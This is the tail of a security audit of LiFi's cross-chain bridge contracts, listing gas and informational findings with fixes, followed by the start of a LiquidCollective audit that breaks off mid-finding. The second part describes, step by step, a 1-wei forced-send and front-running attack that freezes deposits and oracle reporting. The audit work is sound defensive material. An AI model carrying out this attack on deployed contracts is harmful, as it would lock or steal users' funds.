+5.3.18 Unsafe casting of bridge amount from uint256 to uint128 Severity: Low Risk Context: MakerTeleportFacet.sol#L118 Description: The issue with this code is that it performs an unsafe cast from a uint256 value to a uint128 value in the call to the initiateTeleport() function. The _bridgeData.minAmount parameter passed to this function is of type uint256, but it is cast to uint128 without any checks, which may result in a loss of precision or even an overflow. function _startBridge(ILiFi.BridgeData memory _bridgeData) internal { LibAsset.maxApproveERC20( IERC20(dai), address(teleportGateway), _bridgeData.minAmount ); teleportGateway.initiateTeleport( l1Domain, _bridgeData.receiver, uint128(_bridgeData.minAmount) ); Recommendation: To address this issue, it is recommended to use a SafeCast library that provides safe casting methods with appropriate checks to avoid any potential issues with loss of precision or overflows. The SafeCast library can be used to safely cast the uint256 value to uint128 before passing it to the initiateTeleport() function (a short sketch follows after 5.4.3 below). LiFi: Fixed with PR 257. Spearbit: Verified.
5.4 Gas Optimization
+5.4.1 Cache s.anyTokenAddresses[_bridgeData.sendingAssetId] Severity: Gas Optimization Context: MultichainFacet.sol#L203-L245 Description: The function _startBridge() of MultichainFacet contains the following expression. This retrieves the value for s.anyTokenAddresses[_bridgeData.sendingAssetId] twice. It might save some gas to first store this in a tmp variable. s.anyTokenAddresses[_bridgeData.sendingAssetId] != address(0) ? s.anyTokenAddresses[_bridgeData.sendingAssetId] : ... Recommendation: Consider storing s.anyTokenAddresses[_bridgeData.sendingAssetId] in a tmp variable. LiFi: Fixed with PR 293. Spearbit: Verified.
+5.4.2 DeBridgeFacet permit seems unusable Severity: Gas Optimization Context: DeBridgeFacet.sol#L119-L148 Description: The function deBridgeGate.send() takes a parameter permit. This can only be used if it's signed by the Diamond, see DeBridgeGate.sol#L654-L662. As there is no code to let the Diamond sign a permit, this parameter doesn't seem usable. function _startBridge(...) ... { ... deBridgeGate.send{ value: nativeAssetAmount }(..., _deBridgeData.permit, ...); ... } Recommendation: Check this conclusion and consider removing _deBridgeData.permit. LiFi: Fixed with PR 291. Spearbit: Verified.
+5.4.3 Redundant checks in CircleBridgeFacet Severity: Gas Optimization Context: CircleBridgeFacet.sol#L65-L87, Validatable.sol#L24-L39 Description: The function swapAndStartBridgeTokensViaCircleBridge() contains both noNativeAsset() and onlyAllowSourceToken(). The check noNativeAsset() is not necessary, as onlyAllowSourceToken() already verifies the sendingAssetId isn't a native token. function swapAndStartBridgeTokensViaCircleBridge(...) ... { ... noNativeAsset(_bridgeData) onlyAllowSourceToken(_bridgeData, usdc) { ... } modifier noNativeAsset(ILiFi.BridgeData memory _bridgeData) { if (LibAsset.isNativeAsset(_bridgeData.sendingAssetId)) { revert NativeAssetNotSupported(); } _; } modifier onlyAllowSourceToken(ILiFi.BridgeData memory _bridgeData, address _token) { if (_bridgeData.sendingAssetId != _token) { revert InvalidSendingToken(); } _; } Recommendation: Consider removing noNativeAsset(). LiFi: Fixed with PR 255 & PR 294. Spearbit: Verified.
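Returning to 5.3.18: a minimal sketch of the SafeCast recommendation (hedged; it assumes OpenZeppelin's SafeCast library, whose toUint128() reverts when the value doesn't fit):
import { SafeCast } from "@openzeppelin/contracts/utils/math/SafeCast.sol";
teleportGateway.initiateTeleport(
    l1Domain,
    _bridgeData.receiver,
    // reverts instead of silently truncating when minAmount > type(uint128).max
    SafeCast.toUint128(_bridgeData.minAmount)
);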
+5.4.4 Redundant check on _swapData Severity: Gas Optimization Context: MakerTeleportFacet.sol#L89-L91 Description: This check is not present in the majority of the facets: if (_swapData.length == 0) { revert NoSwapDataProvided(); } Ultimately, it's not required, as _depositAndSwap() reverts when the length is 0. Recommendation: Consider removing this check to save gas. LiFi: Fixed in PR 276. Spearbit: Verified.
+5.4.5 Duplicate checks done Severity: Gas Optimization Context: ArbitrumBridgeFacet.sol#L131, AmarokFacet.sol#L67 Description: In the highlighted cases, a check has been done multiple times at different places: • the validateBridgeData modifier on ArbitrumBridgeFacet._startBridge() does checks already done by the functions from which it's called. • depositAsset() does some checks already done by AmarokFacet.startBridgeTokensViaAmarok(). Recommendation: • Remove the validateBridgeData modifier from the ArbitrumBridgeFacet._startBridge() function. • LibAsset.depositAsset() performs several checks already done in modifiers present in AmarokFacet. While it's unsafe to remove those checks from depositAsset() as it's used in different places, to save gas you can create an "unsafe" version of it that removes those checks. You need to be careful in integrating that version. LiFi: • Removed the validateBridgeData modifier, PR 288. • We don't want to maintain multiple versions of the depositAsset() method. Spearbit: Verified and acknowledged.
+5.4.6 calldata can be used instead of memory Severity: Gas Optimization Context: LibAsset.sol#L120, AcrossFacet.sol#L78, CBridgeFacet.sol#L70, CBridgeFacet.sol#L96, CelerIMFacet.sol#L116, CelerIMFacet.sol#L158, GravityFacet.sol#L90, HopFacet.sol#L149, MultichainFacet.sol#L205, SquidFacet.sol#L128, RelayerCelerIM.sol#L157-L15, ServiceFeeCollector.sol#L122 Description: When an incoming argument is constant, calldata can be used instead of memory to save gas on copying it to memory. This remains true for individual array elements. Recommendation: Consider replacing memory with calldata in the highlighted code above. Also, consider tracing those arguments through function calls to ensure they are not being copied to memory. LiFi: Fixed in PR 268. Spearbit: Verified.
+5.4.7 Further gas optimizations for HopFacetOptimized Severity: Gas Optimization Context: HopFacetOptimized.sol#L15-L22, HopFacetOptimized.sol#L50-L72, ILiFi.sol#L7-L18, LibAsset.sol#L91-L105 Description: For the contract HopFacetOptimized it is very important to be gas optimized. Especially on Arbitrum, it is relatively expensive due to the calldata. struct HopData { uint256 bonderFee; uint256 amountOutMin; uint256 deadline; uint256 destinationAmountOutMin; uint256 destinationDeadline; IHopBridge hopBridge; } struct BridgeData { bytes32 transactionId; string bridge; string integrator; address referrer; address sendingAssetId; address receiver; uint256 minAmount; uint256 destinationChainId; bool hasSourceSwaps; bool hasDestinationCall; } function startBridgeTokensViaHopL1ERC20( ILiFi.BridgeData calldata _bridgeData, HopData calldata _hopData ) external { // Deposit assets LibAsset.transferFromERC20(...); _hopData.hopBridge.sendToL2(...); emit LiFiTransferStarted(_bridgeData); } function transferFromERC20(...) ...
{ if (assetId == NATIVE_ASSETID) revert NullAddrIsNotAnERC20Token(); if (to == NULL_ADDRESS) revert NoTransferToNullAddress(); IERC20 asset = IERC20(assetId); uint256 prevBalance = asset.balanceOf(to); SafeERC20.safeTransferFrom(asset, from, to, amount); if (asset.balanceOf(to) - prevBalance != amount) revert InvalidAmount(); } Recommendation: Consider shrinking HopData and BridgeData. The transactionId might be enough to track the transfer. A signature from the API could be added to verify authenticity and prevent spam; in that case, adding a nonce is useful to prevent replays. Some uint256 fields might be replaced by smaller types. Consider having a dedicated version of transferFromERC20() with fewer checks; note this will increase some risks. Consider having a standalone version of the HopFacetOptimized bridge to remove any overhead from the Diamond and its proxy. In that case, consider having a vanity address with leading 0s for HopFacetOptimized, see create2crunch. Consider having a very limited number of functions and make sure the most important functions have the lowest value for their signature. This will reduce some gas. Remove the redundant event: HopFacetOptimized.sol#L26. Note: _depositAndSwap() is complicated and gas intensive and could be optimized by a redesign. LiFi: Several optimizations applied in HopFacetPacked.sol via PR 283. Spearbit: Verified.
+5.4.8 payable keyword can be removed for some bridge functions Severity: Gas Optimization Context: CircleBridgeFacet.sol#L48, MakerTeleportFacet.sol#L59, GnosisBridgeFacet.sol#L43 Description: For the highlighted functions above, the native token is never forwarded to the underlying bridge. In these cases, the payable keyword and the related modifier refundExcessNative(payable(msg.sender)) can be removed to save gas. Recommendation: Remove the payable keyword and the refundExcessNative(payable(msg.sender)) modifier from the highlighted functions. LiFi: Fixed in PR 265. Spearbit: Verified.
+5.4.9 AmarokData.callTo can be removed Severity: Gas Optimization Context: AmarokFacet.sol#L29, AmarokFacet.sol#L122-L124 Description: AmarokFacet's final receiver can be different from _bridgeData.receiver: address receiver = _bridgeData.hasDestinationCall ? _amarokData.callTo : _bridgeData.receiver; Since both _amarokData.callTo and _bridgeData.receiver are passed by the caller, AmarokData.callTo can be removed, and _bridgeData.receiver can be assumed to be the final receiver. Recommendation: Remove the callTo field from the AmarokData struct, and apply this diff:
-address receiver = _bridgeData.hasDestinationCall
-    ? _amarokData.callTo
-    : _bridgeData.receiver;
 // initiate bridge transaction
 connextHandler.xcall{ value: _amarokData.relayerFee }(
     _amarokData.destChainDomainId,
-    receiver,
+    _bridgeData.receiver,
LiFi: Fixed in PR 263. Spearbit: Verified.
+5.4.10 Use requiredEther variable instead of adding twice Severity: Gas Optimization Context: ArbitrumBridgeFacet.sol#L144-L178 Description: The cost and nativeAmount are added twice to calculate the requiredEther value, which leads to increased gas consumption. Recommendation: Use the requiredEther variable in the _startNativeBridge function:
 if (isNativeTransfer) {
-    _startNativeBridge(_bridgeData, _arbitrumData, _cost);
+    _startNativeBridge(_bridgeData, _arbitrumData, requiredEther);
 } else {
     _startTokenBridge(_bridgeData, _arbitrumData, _cost);
 }
 ....
 function _startNativeBridge(
     ILiFi.BridgeData memory _bridgeData,
     ArbitrumData calldata _arbitrumData,
     uint256 requiredEther
 ) private {
     inbox.unsafeCreateRetryableTicket{
-        value: _bridgeData.minAmount + cost
+        value: requiredEther
     }
LiFi: Fixed with PR 262. Spearbit: Verified.
+5.4.11 refundExcessNative modifier can be gas-optimized Severity: Gas Optimization Context: SwapperV2.sol#L118-L126 Description: The highlighted code above can be gas-optimized by removing one if condition. Recommendation: Replace the highlighted code with: if (finalBalance > initialBalance) { LibAsset.transferAsset( LibAsset.NATIVE_ASSETID, _refundReceiver, finalBalance - initialBalance ); } LiFi: Fixed in PR 260. Spearbit: Verified.
+5.4.12 BridgeData.hasSourceSwaps can be removed Severity: Gas Optimization Context: ILiFi.sol#L16 Description: The field hasSourceSwaps can be removed from the struct BridgeData; _swapData is enough to identify whether source swaps are needed. Recommendation: Delete the field BridgeData.hasSourceSwaps and all the resulting checks, like the containsSourceSwaps and doesNotContainSourceSwaps modifiers. LiFi: We need hasSourceSwaps in BridgeData for off-chain analysis. Spearbit: Acknowledged.
+5.4.13 Unnecessary validation argument for native token amount Severity: Gas Optimization Context: ServiceFeeCollector.sol#L56, ServiceFeeCollector.sol#L90 Description: Since both msg.value and feeAmount are controlled by the caller, feeAmount can be removed as an argument, assuming msg.value is what needs to be collected. This will save gas on comparing these two values and refunding the extra. Recommendation: Remove feeAmount as an argument for collectNativeInsuranceFees() and collectNativeGasFees():
-function collectNativeInsuranceFees(uint256 feeAmount, address receiver)
+function collectNativeInsuranceFees(address receiver)
     external payable
 {
-    if (msg.value < feeAmount) revert NotEnoughNativeForFees();
-    uint256 remaining = msg.value - (feeAmount);
-    // Prevent extra native token from being locked in the contract
-    if (remaining > 0) {
-        (bool success, ) = payable(msg.sender).call{ value: remaining }("");
-        if (!success) {
-            revert TransferFailure();
-        }
-    }
     emit InsuranceFeesCollected(
         LibAsset.NULL_ADDRESS,
         receiver,
-        feeAmount
+        msg.value
     );
 }
LiFi: Fixed in PR 259. Spearbit: Verified.
5.5 Informational
+5.5.1 Restrict access for cBridge refunds Severity: Informational Context: WithdrawFacet.sol#L28-L56 Description: cBridge refunds need to be triggered from the contract that sent the transaction to cBridge. This can be done using the executeCallAndWithdraw function. As the function is not cBridge specific, it can make arbitrary calls for the Diamond contract. Restricting what that function can call would allow more secure automation of refunds. Recommendation: Add a dedicated refund function to the Diamond, similar to RelayerCelerIM.sol#L443-L477. LiFi: PR 243. Spearbit: Verified.
+5.5.2 Stargate now supports multiple pools for the same token Severity: Informational Context: StargateFacet.sol#L25-L28 Description: The Stargate protocol now supports multiple pools for the same token on the same chain; each pool may be connected to one or many other chains. It is therefore not possible to store a one-to-one token-to-pool mapping. Recommendation: Pass pools in callData to ensure support for all pools. LiFi: Fixed in PR 237. Spearbit: Verified.
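A minimal sketch of the recommendation's shape (hedged; the srcPoolId/dstPoolId fields on StargateData are illustrative assumptions about where caller-supplied pool ids could live, not the project's actual layout):
struct StargateData {
    uint256 srcPoolId; // pool to debit on the source chain, now supplied by the caller
    uint256 dstPoolId; // pool to credit on the destination chain
    // ... existing fields such as lzFee ...
}
// _startBridge() then forwards the caller-supplied pool ids instead of reading a stored token-to-pool mapping:
router.swap{ value: _stargateData.lzFee }(
    destinationChainId,
    _stargateData.srcPoolId,
    _stargateData.dstPoolId,
    ...
);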
+5.5.3 Expose receiver in GenericSwapFacet facet Severity: Informational Context: GenericSwapFacet.sol#L60-L69 Description: Unlike the bridge facets, the swap facet does not yet emit the receiver of a transaction. Recommendation: Emit a new event containing that information. LiFi: Added in PR 236. Spearbit: Fix is verified with PR 236.
+5.5.4 Track the destination chain on ServiceFeeCollector Severity: Informational Context: ServiceFeeCollector.sol#L44-L56 Description: ServiceFeeCollector collects gas fees to send to the destination chain. For example: /// @param receiver The address to send gas to on the destination chain function collectTokenGasFees( address tokenAddress, uint256 feeAmount, address receiver ) However, the destination chain is never tracked in the contract. Recommendation: Consider adding the destination chain ID to the functions collectTokenGasFees() and collectNativeGasFees(). LiFi: Fixed in PR 289. Spearbit: Verified.
+5.5.5 Executor can reuse SwapperV2 functions Severity: Informational Context: Executor.sol#L32, SwapperV2.sol#L30-L34, Executor.sol#L241, SwapperV2.sol#L30 Description: Executor.sol's noLeftOvers and _fetchBalances() are copied from SwapperV2.sol. Recommendation: Consider reusing these functions from SwapperV2, perhaps by extracting them into LibSwap. LiFi: We will leave as is for now. Spearbit: Acknowledged.
+5.5.6 Consider adding onERC1155Received Severity: Informational Context: Executor.sol#L270 Description: In addition to ERC721, NFTs can be created using the ERC1155 standard. Since the use case of purchasing an NFT has to be supported, support for ERC1155 tokens can be added. Recommendation: Consider adding an onERC1155Received function to Executor.sol using ERC1155Holder. You can also use ERC721Holder.sol to replace the current onERC721Received() function. LiFi: Fixed in PR 295. Spearbit: Verified.
+5.5.7 SquidFacet uses a different string encoding library Severity: Informational Context: SquidFacet.sol#L157 Description: SquidFacet uses an OZ library to convert an address to a string, whereas the underlying bridge uses a different library. Fuzzing showed that these implementations are equivalent. Recommendation: This issue is just to highlight this difference. Consider commenting on this difference, or changing the library. LiFi: Acknowledged. Spearbit: Acknowledged.
+5.5.8 Assembly in StargateFacet can be replaced with Solidity Severity: Informational Context: StargateFacet.sol#L295-L313 Description: The function toBytes() contains assembly code that can be replaced with Solidity code. Also, see how-to-convert-an-address-to-bytes-in-solidity. function toBytes(address _address) private pure returns (bytes memory) { bytes memory tempBytes; assembly { let m := mload(0x40) _address := and(_address, 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF) mstore(add(m, 20), xor(0x140000000000000000000000000000000000000000, _address) ) mstore(0x40, add(m, 52)) tempBytes := m } return tempBytes; } Recommendation: Consider using abi.encodePacked(_address). LiFi: Fixed with PR 290. Spearbit: Verified.
+5.5.9 Doublecheck quoteLayerZeroFee() Severity: Informational Context: StargateFacet.sol#L168-L218 Description: The function quoteLayerZeroFee() uses msg.sender to determine a fee, while _startBridge() uses _bridgeData.receiver to execute router.swap. This might give different results. function quoteLayerZeroFee(...) ... { return router.quoteLayerZeroFee( ... , toBytes(msg.sender) ); } function _startBridge(...) ...
router.swap{ value: _stargateData.lzFee }(..., toBytes(_bridgeData.receiver), ... ); ... } Recommendation: Doublecheck that using msg.sender in quoteLayerZeroFee() results in the right fee. LiFi: Fixed with PR 292. Spearbit: Verified.
+5.5.10 Missing modifier refundExcessNative() Severity: Informational Context: GnosisBridgeFacet.sol#L59-L83, GnosisBridgeL2Facet.sol#L58-L82 Description: The function swapAndStartBridgeTokensViaXDaiBridge() of GnosisBridgeFacet and GnosisBridgeL2Facet doesn't have the modifier refundExcessNative(), while other facets have such a modifier. Recommendation: Doublecheck whether the modifier refundExcessNative() has to be added. LiFi: Fixed with PR 280. Spearbit: Verified.
+5.5.11 Special case for cfUSDC tokens in CelerIMFacet Severity: Informational Context: CelerIMFacet.sol#L63-L149 Description: The function startBridgeTokensViaCelerIM() has a special case for cfUSDC tokens, whereas swapAndStartBridgeTokensViaCelerIM() doesn't. function startBridgeTokensViaCelerIM(...) ... { if (!LibAsset.isNativeAsset(_bridgeData.sendingAssetId)) { if (...) { // special case for cfUSDC token asset = IERC20(CelerToken(_bridgeData.sendingAssetId).canonical()); } else { ... } } ... } function swapAndStartBridgeTokensViaCelerIM(...) ... { ... if (!LibAsset.isNativeAsset(_bridgeData.sendingAssetId)) { // no special case for cfUSDC token } ... } Recommendation: Doublecheck whether swapAndStartBridgeTokensViaCelerIM() should also have a special case for cfUSDC tokens. LiFi: Fixed with PR 254. Spearbit: Verified.
+5.5.12 External calls of SquidFacet Severity: Informational Context: SquidFacet.sol#L126-L175 Description: The functions callBridge and callBridgeCall make arbitrary external calls. This is done via a separate multicall contract, SquidMulticall. This might be used to attempt reentrancy attacks. function _startBridge(...) ... { ... squidRouter.bridgeCall{ value: msgValue }(...); ... squidRouter.callBridgeCall{ value: msgValue }(...); ... } Recommendation: This adds to the case for having nonReentrant modifiers. LiFi: Acknowledged. Spearbit: Acknowledged.
+5.5.13 Missing test coverage for the triggerRefund function Severity: Informational Context: RelayerCelerIM.sol#L449 Description: The current test suite does not include test cases for the triggerRefund function. This oversight may lead to undetected bugs or unexpected behavior in the function's implementation. Recommendation: Add new test cases to the existing test suite and run the tests to confirm that the triggerRefund function operates as expected. LiFi: Fixed with PR 296. Spearbit: Verified.
+5.5.14 Implicit assumption in MakerTeleportFacet Severity: Informational Context: MakerTeleportFacet.sol#L108-L122 Description: The function _startBridge() of MakerTeleportFacet has the implicit assumption that dai is an ERC20 token. However, on GnosisChain the native asset is (x)dai. Note: DAI on GnosisChain is an ERC20, so it is unlikely this would be a problem in practice. function _startBridge(ILiFi.BridgeData memory _bridgeData) internal { LibAsset.maxApproveERC20( IERC20(dai), ...); ... } Recommendation: Enforce dai != 0 or at least add a comment. LiFi: Acknowledged. MakerTeleportFacet is used to bridge Dai (0xDA10009cBd5D07dd0CeCc66161FC93D7c9000da1) from Optimism and Arbitrum to mainnet. Spearbit: Acknowledged.
+5.5.15 Robust allowance handling in maxApproveERC20() Severity: Informational Context: LibAsset.sol#L52-L67 Description: Some tokens, like USDT, require setting the approval to 0 before setting it to another value.
The function SafeERC20.safeIncreaseAllowance() doesn't do this. Luckily, maxApproveERC20() sets the allowance so high that in practice it never has to be increased. function maxApproveERC20(...) ... { ... uint256 allowance = assetId.allowance(address(this), spender); if (allowance < amount) SafeERC20.safeIncreaseAllowance(IERC20(assetId), spender, MAX_UINT - allowance); } Recommendation: Consider setting the allowance to 0 first in maxApproveERC20(). LiFi: Fixed with PR 286. Spearbit: Verified.
+5.5.16 Unused re-entrancy guard Severity: Informational Context: RelayerCelerIM.sol#L21 Description: RelayerCelerIM.sol#L21 includes a re-entrancy guard that is never used. While re-entrancy guards are crucial for securing contracts, this particular guard is redundant. Recommendation: Consider reviewing the contract and deleting the re-entrancy guard if it's not needed. LiFi: Fixed with PR 272. Spearbit: Verified.
+5.5.17 Redundant duplicate import in LIFuelFacet Severity: Informational Context: LIFuelFacet.sol#L13 Description: The current LIFuelFacet.sol contains a redundant duplicate import. Identifying and removing duplicate imports can streamline the contract and improve maintainability. Recommendation: Consider removing the duplicate import. import { LibMappings } from "../Libraries/LibMappings.sol"; import { Validatable } from "../Helpers/Validatable.sol"; - import { LibMappings } from "../Libraries/LibMappings.sol"; LiFi: Fixed in PR 270. Spearbit: Verified.
+5.5.18 Extra checks in executeMessageWithTransfer() Severity: Informational Context: RelayerCelerIM.sol#L67-L111 Description: The function executeMessageWithTransfer() of RelayerCelerIM ignores the first parameter. It seems this could be used to verify the origin of the transaction, which could be an extra security measure. * @param * (unused) The address of the source app contract function executeMessageWithTransfer(address, ...) ... { } Recommendation: Check whether it is useful to verify the value of the first parameter of executeMessageWithTransfer(). LiFi: Acknowledged. Spearbit: Acknowledged.
+5.5.19 Variable visibility is not uniform Severity: Informational Context: ThorSwapFacet.sol#L19, SynapseBridgeFacet.sol#L21 Description: In the current facets, the visibility of state variables like routers/messengers is not uniform, with some variables declared as public while others are private: thorchainRouter => defined as public; synapseRouter => defined as public; deBridgeGate => defined as private. Recommendation: Consider reviewing the codebase to identify variables with inconsistent visibility settings. LiFi: Fixed with PR 285. Spearbit: Verified.
+5.5.20 Library LibMappings not used everywhere Severity: Informational Context: LibMappings.sol Description: The library LibMappings is used in several facets. However, it is not used in the following facets: • ReentrancyGuard • AxelarFacet • HopFacet.sol • MultichainFacet • OptimismBridgeFacet • OwnershipFacet Recommendation: Consider using LibMappings where possible. LiFi: Solved by removing LibMappings in all other facets, via PR 287. Spearbit: Verified.
+5.5.21 transferERC20() doesn't have a null address check for the receiver Severity: Informational Context: LibAsset.sol#L79-L98 Description: LibAsset.transferFromERC20() has a null address check on the receiver, but transferERC20() does not. Recommendation: Verify whether this difference is intentional.
Consider making these checks uniform across both functions, depending on the requirement. LiFi: Fixed in PR 284. Spearbit: Verified.
+5.5.22 LibBytes can be improved Severity: Informational Context: LibBytes.sol Description: The following functions are not used: • concat() • concatStorage() • equal() • equalStorage() • toBytes32() • toUint128() • toUint16() • toUint256() • toUint32() • toUint64() • toUint8() • toUint96() The call to the function slice() for calldata arguments (as done in AxelarExecutor) can be replaced with the built-in slicing provided by Solidity; refer to its documentation. Recommendation: Consider removing the unused functions. If you want to depend on default Solidity primitives, you can replace the call to slice() with the default counterpart for calldata arrays. Note: SquidFacet also imports the Strings library. The function can be kept in LibBytes. LiFi: Fixed with PR 267. Spearbit: Verified.
+5.5.23 Keep generic errors in GenericErrors Severity: Informational Context: RelayerCelerIM.sol#L30 Description: During the code review, it has been noticed that some of the contracts re-define errors. Generic errors like WithdrawFailed can be kept in GenericErrors.sol. Recommendation: It is recommended to review all errors and place them in GenericErrors.sol. LiFi: Fixed with PR 271. Spearbit: Verified.
+5.5.24 Attention points for making the Diamond immutable Severity: Informational Context: src Description: There are additional attention points to decide upon when making the Diamond immutable. After removing the Owner, the following functions won't work anymore: • AccessManagerFacet.sol - setCanExecute() • AxelarFacet.sol - setChainName() • HopFacet.sol - registerBridge() • MultichainFacet.sol - updateAddressMappings() & registerRouters() • OptimismBridgeFacet.sol - registerOptimismBridge() • PeripheryRegistryFacet.sol - registerPeripheryContract() • StargateFacet.sol - setStargatePoolId() & setLayerZeroChainId() • WormholeFacet.sol - setWormholeChainId() & setWormholeChainIds() There is another authorization mechanism via LibAccess, which arranges access to the functions of: • DexManagerFacet.sol • WithdrawFacet.sol Several Periphery contracts also have an Owner: • AxelarExecutor.sol • ERC20Proxy.sol • Executor.sol • FeeCollector.sol • Receiver.sol • RelayerCelerIM.sol • ServiceFeeCollector.sol Additionally, ERC20Proxy has an authorization mechanism via authorizedCallers[]. Recommendation: Consider doing the following: • create an alternative way to update the essential functions that are currently authorized via the owner, perhaps with LibAccess; • remove the authorizations of DexManagerFacet.sol and WithdrawFacet.sol, or remove these facets; • evaluate the Periphery contracts and determine whether the Owners should be locked down; • evaluate the authorization mechanism of ERC20Proxy and check what should be locked down. LiFi: Acknowledged. Spearbit: Acknowledged.
+5.5.25 Check on the final asset in _swapData Severity: Informational Context: MakerTeleportFacet.sol#L92 Description: MakerTeleportFacet verifies that the final received asset in _swapData is DAI. This check is not present in the majority of the facets (including CircleBridgeFacet). Ideally, every facet should have a check that the final receivingAssetId is equal to sendingAssetId. Recommendation: Consider adding this check for all facets.
If you do, consider making a modifier for: if (_swapData.length == 0) { revert NoSwapDataProvided(); } if (_swapData[_swapData.length - 1].receivingAssetId != dai) { revert InvalidSendingToken(); } Alternatively, consider removing it everywhere, because the transaction will revert anyway. LiFi: We decided to remove those checks from already existing facets such as MakerTeleportFacet. We keep no tokens in the Diamond, so even if receivingAssetId is not equal to sendingAssetId, it will fail. Check removed in PR 276. Spearbit: Verified.
+5.5.26 Discrepancies in pragma versioning across facet implementations Severity: Informational Context: AllBridgeFacet.sol#L2, ThorSwapFacet.sol#L2 Description: The use of different pragma versions in facet implementations can present several implications, with potential risks and compliance concerns that need to be addressed to maintain robust and compliant contracts. Recommendation: Consider changing the pragmas to 0.8.17. LiFi: Solved in PR 277. Spearbit: Verified.
+5.5.27 Inconsistent use of validateDestinationCallFlag() Severity: Informational Context: AmarokFacet.sol#L61-L65, SquidFacet.sol#L74-L79 Description: The highlighted code can be replaced with a call to the validateDestinationCallFlag() function, as done in other facets. Recommendation: Replace the highlighted code with a call to the validateDestinationCallFlag() function. LiFi: Fixed in PR 269. Spearbit: Verified.
+5.5.28 Inconsistent utilization of the isNativeAsset function Severity: Informational Context: AcrossFacet.sol#L106, LibAsset.sol#L97 Description: The isNativeAsset function is designed to distinguish native assets from other tokens within facet-based smart contract implementations. However, it has been observed that the usage of the isNativeAsset function is not consistent across the various facets. Ensuring uniform application of this function is crucial for maintaining the accuracy and reliability of asset identification and processing within the facets. Recommendation: Consider utilizing the isNativeAsset function consistently. LiFi: Fixed with PR 274. Spearbit: Verified.
+5.5.29 Unused events/errors Severity: Informational Context: Executor.sol#L23-L24, HopFacetOptimized.sol#L26-L27, ThorSwapFacet.sol#L10 Description: The contracts contain several events and error messages that are not used anywhere in the contract code. These unused events and errors add unnecessary code to the contract, increasing its size. Recommendation: It is recommended to remove any unused events and errors from the contract code to make it more streamlined and easier to read. This can be done by performing a code review and identifying any events or errors that are not referenced in the contract code. LiFi: Fixed with PR 261 and PR 266. Spearbit: Verified.
+5.5.30 Make bridge parameters dynamic by keeping them as a parameter Severity: Informational Context: HopFacetOptimized.sol#L147, MakerTeleportFacet.sol#L115 Description: The current implementation has some bridge parameters hardcoded within the smart contract. This approach limits the flexibility of the contract and may cause issues in the future when upgrades or changes to the bridge parameters are required. It would be better to keep the bridge parameters as parameters, making them dynamic and easily changeable in the future. HopFacetOptimized.sol => relayer & relayerFee. MakerTeleportFacet.sol => operator: the person (or specified third party) responsible for initiating the minting process on the destination domain by providing (in the fast path) oracle attestations.
Recommendation: Modify the smart contract code to include bridge parameters as parameters rather than hardcoding them. This will allow for easier upgrades and changes to the bridge parameters in the future without the need for extensive modifications to the code. LiFi: Acknowledged. Spearbit: Acknowledged.
+5.5.31 Incorrect comment Severity: Informational Context: CircleBridgeFacet.sol#L32 Description: The highlighted comment incorrectly refers to the USDC address as the DAI address. Recommendation: - /// @param _usdc The address of DAI on the source chain. + /// @param _usdc The address of USDC on the source chain. LiFi: Fixed in PR 264. Spearbit: Verified.
+5.5.32 Redundant console log Severity: Informational Context: ThorSwapFacet.sol#L13 Description: The contract includes console.sol from the test files, which is only used for debugging purposes. Including it in the final version of the contract can increase the contract size and consume more gas, making it more expensive to deploy and execute. Recommendation: Consider removing console.sol. LiFi: Fixed with PR 261. Spearbit: Verified.
+5.5.33 SquidFacet doesn't revert for incorrect routeType Severity: Informational Context: SquidFacet.sol#L174 Description: If the _squidData.routeType passed by the user doesn't match BridgeCall, CallBridge, or CallBridgeCall, SquidFacet just takes the funds from the user and returns without calling the bridge. This, when combined with the issue "Max approval to any address is possible", lets anyone steal those funds. Note: Solidity enum checks should prevent this issue, but it is safer to do an extra check. Recommendation: Add an else condition which just reverts. LiFi: Fixed in PR 248. Spearbit: Verified.
diff --git a/findings_newupdate/spearbit/LiquidCollective-Spearbit-Security-Review.txt b/findings_newupdate/spearbit/LiquidCollective-Spearbit-Security-Review.txt
new file mode 100644
index 0000000..f1017ea
--- /dev/null
+++ b/findings_newupdate/spearbit/LiquidCollective-Spearbit-Security-Review.txt
@@ -0,0 +1,85 @@
+6.1.1 An attacker can freeze all incoming deposits and brick the oracle members' reporting system with only 1 wei Severity: Critical Risk Context: SharesManager.1.sol#L195-L206 Description: An attacker can brick/lock all deposited user funds and also prevent oracle members from coming to a quorum when there is an earning to be distributed as rewards. Consider the following scenario: 1. The attacker force-sends 1 wei to the River contract using, e.g., selfdestruct. The attacker has to make sure to perform this transaction before any other users deposit their funds in the contract. The attacker can look at the mempool and also front-run the initial user deposit. Now b = _assetBalance() > 0 is at least 1 wei. 2. Now an allowed user tries to deposit funds into the River protocol. The call eventually ends up in _mintShares(o, x), and in the first line oldTotalAssetBalance = _assetBalance() - x, where _assetBalance() represents the updated River balance after taking the user's deposit x into account as well. So _assetBalance() is now b + x + ... and oldTotalAssetBalance = b + ..., where the ... includes the beacon balance sum, deposited amounts for validators in queue, ... (which is probably 0 by now).
Therefore, oldTotalAssetBalance > 0 means that the following if block is skipped: if (oldTotalAssetBalance == 0) { _mintRawShares(_owner, _underlyingAssetValue); return _underlyingAssetValue; } And execution goes directly to the else block for the first allowed user deposit: else { uint256 sharesToMint = (_underlyingAssetValue * _totalSupply()) / oldTotalAssetBalance; _mintRawShares(_owner, sharesToMint); return sharesToMint; } But since no shares have been minted yet, _totalSupply() == 0, and therefore sharesToMint == 0. So we mint 0 shares for the user and return 0. Note that _assetBalance() keeps increasing, but _totalSupply() or Shares.get() remains 0. 3. Now the next allowed users deposit funds and, just like step 2, River would mint them 0 shares; _assetBalance() increases but _totalSupply() or Shares.get() remains 0. Note that _totalSupply() or Shares.get() remains 0 until the oracle members come to a quorum on the beacon balance sum and number of validators for a voting frame. Then the last oracle member who calls reportBeacon to trigger the quorum causes a call to _pushToRiver, which in turn calls river.setBeaconData. Now in setBeaconData, if we have accumulated interest then _onEarnings is called. The first few lines of _onEarnings are: uint256 currentTotalSupply = _totalSupply(); if (currentTotalSupply == 0) { revert ZeroMintedShares(); } But _totalSupply() is still 0, so revert ZeroMintedShares() is hit and the revert bubbles up the call stack of reportBeacon, which means that the last oracle member that can trigger a quorum will have its call to reportBeacon reverted. Therefore, no quorum that includes earnings will ever succeed, and the River protocol will stay unaware of its deposited validators on the beacon chain. Any possible path to _mintRawShares (which could cause Shares.get() to increase) is also blocked, and _totalSupply() would stay at 0. So even after validators, oracle members, etc. become active, when an allowed user deposits they would receive 0 shares. Note that an attacker can turn this into a DoS attack on the River protocol, since redeployment alone would not solve this issue. The attacker can monitor the mempool and always try to be the first person to force-deposit 1 wei into the deployed River contract. 